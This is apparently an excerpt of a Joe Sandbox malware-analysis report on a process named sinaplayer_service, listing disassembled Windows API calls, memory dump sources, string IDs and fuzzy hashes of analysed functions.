                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5AABB2
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000,00000000), ref: 6C5AABBD
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,00000000,?,7FFFFFFF,00000000,?,xL,00ED4598,00ED4C78,00000000,00ED4598,00000000,00000000), ref: 6C5AABC7
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo$CompareString__crt_getptd_strnicmp_l
                                                                                                                                                                                                    • String ID: xL
                                                                                                                                                                                                    • API String ID: 535387727-2859553101
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?,?,?,?,6C564F10,?,6C564F30,00000010), ref: 6C564DFA
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?), ref: 6C564E1D
                                                                                                                                                                                                      • Part of subcall function 6C564D4B: __doserrno.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C564D84
                                                                                                                                                                                                      • Part of subcall function 6C564D4B: _errno.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C5AEFE6
                                                                                                                                                                                                      • Part of subcall function 6C564D4B: _invalid_parameter_noinfo.MSVCR120(?,6C567FEE,00000000,00000000,00000000,00000000,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C5AEFF1
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6C564E24
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(00000002), ref: 6C582A17
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(00000001,00000002), ref: 6C582A20
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C5AE211
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$CloseErrorHandleLast__doserrno_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID: po
                                                                                                                                                                                                    • API String ID: 1012986785-679877212
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 6C576B3D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 6C576B48
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumberEx,?,?,?,?,?,6C576C5D), ref: 6C576B77
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6C576B7E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                    • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$]lWl$kernel32.dll
                                                                                                                                                                                                    • API String ID: 667068680-3195207190
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00000000,?,000000FF,?,?,?,0038FF03,8285FFAB,00000000,00000000,0038EBA0), ref: 0038FDA6
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0038EBA0,?,0038FF03,8285FFAB,00000000,00000000,0038EBA0), ref: 0038FDB8
                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(dbghelp.dll,?,0038FF03,8285FFAB,00000000,00000000,0038EBA0), ref: 0038FDC4
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0038EBA0,?,0038FF03,8285FFAB,00000000,00000000,0038EBA0), ref: 0038FDD2
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(76EBFFB0,MiniDumpWriteDump), ref: 0038FDDE
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0038EBA0,?,0038FF03,8285FFAB,00000000,00000000,0038EBA0), ref: 0038FDED
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
• Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave$AddressLibraryLoadProc
                                                                                                                                                                                                    • String ID: MiniDumpWriteDump$dbghelp.dll
                                                                                                                                                                                                    • API String ID: 2049748340-4105291546
                                                                                                                                                                                                    • Opcode ID: fa588cb61b5941f9f930fead1165861cb30f484b61998bf1334107f6b4db46ac
                                                                                                                                                                                                    • Instruction ID: 37e40add4cf85590262c7c2d848a5cd9c1754f782f785b04da6ea1fe910c56fc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa588cb61b5941f9f930fead1165861cb30f484b61998bf1334107f6b4db46ac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24014671500308AFCB22ABA8DC45AAAF7FCFB48724F11096EE685D3210D771ED018BA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120 ref: 0038FFBF
                                                                                                                                                                                                    • memset.MSVCR120 ref: 0038FFD2
                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000308,?,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 00390013
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 00390035
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 0039003D
                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCR120(00000000,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 00390042
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 0039014A
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 00390152
                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCR120(00000000,?,?,?,8285FFAB,00000000,00000000,0038EBA0), ref: 00390166
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle$memset$MemoryProcessRead
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3544107872-0
                                                                                                                                                                                                    • Opcode ID: 425e82b1b03d7aa79c99d298575e47dc239d28d5553074bf9b85dfc19c6fdaec
                                                                                                                                                                                                    • Instruction ID: 77949660e2236f27efdb925f3e76081025943d90ad6317d568007fb1d8de709b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 425e82b1b03d7aa79c99d298575e47dc239d28d5553074bf9b85dfc19c6fdaec
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83C13874A012189FDF26CF28C884BAAB7F8BF08314F1541E9E959A7291D734AF85CF50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • free.MSVCR120(?,00006A69), ref: 6C571A4A
                                                                                                                                                                                                    • free.MSVCR120(?,?,00006A69), ref: 6C571A55
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000050), ref: 6C572860
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004), ref: 6C572881
                                                                                                                                                                                                      • Part of subcall function 6C562226: malloc.MSVCR120(6C5CC0AD,6C633B90,6C633B90,?,?,6C5CC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6C562237
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004), ref: 6C5728A4
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6C5B01B6
                                                                                                                                                                                                    • ___free_lconv_num.LIBCMT ref: 6C5B01C7
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6C5B01D4
                                                                                                                                                                                                    • free.MSVCR120(?,?), ref: 6C5B01DD
                                                                                                                                                                                                      • Part of subcall function 6C571BFC: __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,00000000), ref: 6C571C46
                                                                                                                                                                                                      • Part of subcall function 6C571BFC: _calloc_crt.MSVCR120(00000000,00000002,?,?,?,00000000), ref: 6C571C5B
                                                                                                                                                                                                      • Part of subcall function 6C571BFC: __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,?,00000000), ref: 6C571C77
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$InfoLocale__crt_calloc_crt_malloc_crt$___free_lconv_nummalloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2413701623-0
                                                                                                                                                                                                    • Opcode ID: a5f5526e4d0559ee57dbb13afc54adfd5ddbbe7c4c4d20b4ccd84dadcadbf5ee
                                                                                                                                                                                                    • Instruction ID: c0fe4d095e121dc4a02a472fee465f25ba3dd96c5b8c8a8e592537d3bd009553
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5f5526e4d0559ee57dbb13afc54adfd5ddbbe7c4c4d20b4ccd84dadcadbf5ee
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4961EF72A00205EFDB20CF69CC81B9A7BF4EB45354F14456AE958EBB90E770DD81CBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _fileno
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 467780811-0
                                                                                                                                                                                                    • Opcode ID: 756f9a4d1c95a05374728af732d019ad3b500af89c7501936d51ab0b3dd8420a
                                                                                                                                                                                                    • Instruction ID: 4810beda6f51d44bde2353cf072296e731505cd807265a02079e003d0f382259
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 756f9a4d1c95a05374728af732d019ad3b500af89c7501936d51ab0b3dd8420a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40512631402A1AEBC700CBAACC50B69B7B0BF56728F64835ED43587EE0E774D856CB81
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0FilePath@base@@QAE@XZ.BASE(8285FFAB), ref: 003805AA
                                                                                                                                                                                                    • ?AppendRelativePath@FilePath@base@@QBE_NABV12@PAV12@@Z.BASE(00000000,?), ref: 003805BE
                                                                                                                                                                                                    • ?AsUTF8Unsafe@FilePath@base@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ.BASE(?), ref: 003805D2
                                                                                                                                                                                                    • ?ReplaceSubstringsAfterOffset@@YAXPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IABV12@1@Z.BASE(?,00000000,00000000,00000000,0039E4E0,00000001,0039E4DC,00000001), ref: 00380634
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00380646
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 0038066D
                                                                                                                                                                                                    • ?DirectoryExists@base@@YA_NABVFilePath@1@@Z.BASE(00000000), ref: 00380676
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0038072E
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00380752
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$??3@$D@2@@std@@D@std@@U?$char_traits@V?$allocator@V?$basic_string@$AfterAppendDirectoryExists@base@@Offset@@Path@Path@1@@RelativeReplaceSubstringsUnsafe@V12@V12@1@V12@@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 983993002-0
                                                                                                                                                                                                    • Opcode ID: 5f52c492bf3196bf6a45bae468f7aaf2838c0b79d4dc996d3764e82abddfbee0
                                                                                                                                                                                                    • Instruction ID: 17a7e4ded1d19ef13933d8269392d02a166c1138a64a472c98e0ace53a16fe94
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f52c492bf3196bf6a45bae468f7aaf2838c0b79d4dc996d3764e82abddfbee0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B516E71D00348EBEF22DBA4CC46BDEBBB4AB16314F140199E9157B2C1E7B56A48CB91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00398420: ??0FilePath@base@@QAE@XZ.BASE(8285FFAB,6C6C2BA0,00000000,00000000), ref: 0039846E
                                                                                                                                                                                                      • Part of subcall function 00398420: ?PathExists@base@@YA_NABVFilePath@1@@Z.BASE(?), ref: 0039849B
                                                                                                                                                                                                      • Part of subcall function 00398420: ??2@YAPAXI@Z.MSVCR120(0000001C), ref: 003984C5
                                                                                                                                                                                                      • Part of subcall function 00398420: ??0MemoryMappedFile@base@@QAE@XZ.BASE ref: 003984DD
                                                                                                                                                                                                      • Part of subcall function 00398420: ?Initialize@MemoryMappedFile@base@@QAE_NABVFilePath@2@@Z.BASE(?), ref: 003984FC
                                                                                                                                                                                                      • Part of subcall function 00398420: ??1MemoryMappedFile@base@@QAE@XZ.BASE(?,?), ref: 00398531
                                                                                                                                                                                                      • Part of subcall function 00398420: ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00398538
                                                                                                                                                                                                      • Part of subcall function 00398420: ?Read@JSONReader@base@@SAPAVValue@2@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@Z.BASE(?), ref: 003985A6
                                                                                                                                                                                                    • ?SysWideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,?,8285FFAB,00000000), ref: 00398864
                                                                                                                                                                                                    • ??0Version@base@@QAE@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(00000000), ref: 00398875
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00398888
                                                                                                                                                                                                    • ?SysWideToUTF8@base@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@3@@Z.BASE(?,?), ref: 003988AA
                                                                                                                                                                                                    • ?IsOlderThan@Version@base@@QBE_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.BASE(00000000), ref: 003988BB
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 003988D0
                                                                                                                                                                                                    • ??1Version@base@@QAE@XZ.BASE ref: 003988F9
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,8285FFAB,00000000), ref: 00398908
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,8285FFAB,00000000), ref: 0039892D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??3@D@std@@U?$char_traits@V?$allocator@V?$basic_string@$FileFile@base@@MappedMemoryVersion@base@@$D@2@@std@@D@2@@std@@@F8@base@@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@3@@W@std@@Wide$??2@BasicD@2@@std@@@2@@Exists@base@@Initialize@OlderPathPath@1@@Path@2@@Path@base@@Piece@Read@Reader@base@@StringThan@Value@2@
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2034869197-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2F52
                                                                                                                                                                                                    • free.MSVCR120(-00000004,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2F5E
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2F6C
                                                                                                                                                                                                    • free.MSVCR120(-00000004,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2F78
                                                                                                                                                                                                      • Part of subcall function 6C55ECE0: HeapFree.KERNEL32(00000000,00000000,?,6C5A3D3A,00000000,6C561782,6C5CB407,?,6C5CBD2C,00000003,6C5A3BC7,6C564630,00000008,6C57C625,?), ref: 6C55ECF4
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2F8D
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2FAA
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2FBB
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2FC1
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,6C5C2CBA,00000004,6C5C249A), ref: 6C5C2FD1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$FlushInterlockedList$FreeHeap
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4002485106-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetFileAttributesExW.KERNEL32(?,00000000,?), ref: 6C56EE72
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6C56EE7C
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6C56EE83
                                                                                                                                                                                                      • Part of subcall function 6C56E4A7: __doserrno.MSVCR120(00000000,?,6C5AEE56,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C56E4AB
                                                                                                                                                                                                      • Part of subcall function 6C56E4A7: _errno.MSVCR120(00000000,?,6C5AEE56,00000000,?,6C5AE899,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 6C56E4BE
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C56EE89
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6C5A42A2
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5A42AA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6C5A42B4
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6C5A42C0
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6C5A42CB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$__doserrno$AttributesErrorFileLast__dosmaperr_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2636503730-0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: mapped to net::ERR_FAILED$Unknown error $network_change\net_errors_win.cc$Vll
                                                                                                                                                                                                    • API String ID: 0-399661578
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_Xlength_error@std@@YAXPBD@Z.MSVCP120(string too long,?,?,6C6C52C0,?,00385E65,00000000,00000000,00000000,000000FF,00000000,?,?,0038623B,?,00000000), ref: 003862CD
                                                                                                                                                                                                    • memmove.MSVCR120(00000000,00000000,?,?,?,6C6C52C0,?,00385E65,00000000,00000000,00000000,000000FF,00000000,?,?,0038623B), ref: 00386327
                                                                                                                                                                                                    • memmove.MSVCR120(?,?,?,?,?,6C6C52C0,?,00385E65,00000000,00000000,00000000,000000FF,00000000,?,?,0038623B), ref: 00386365
                                                                                                                                                                                                    • memcpy.MSVCR120(?,?,?,?,?,6C6C52C0,?,00385E65,00000000,00000000,00000000,000000FF,00000000,?,?,0038623B), ref: 00386390
                                                                                                                                                                                                    • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP120(invalid string position,?,?,6C6C52C0,?,00385E65,00000000,00000000,00000000,000000FF,00000000,?,?,0038623B,?,00000000), ref: 003863B0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp
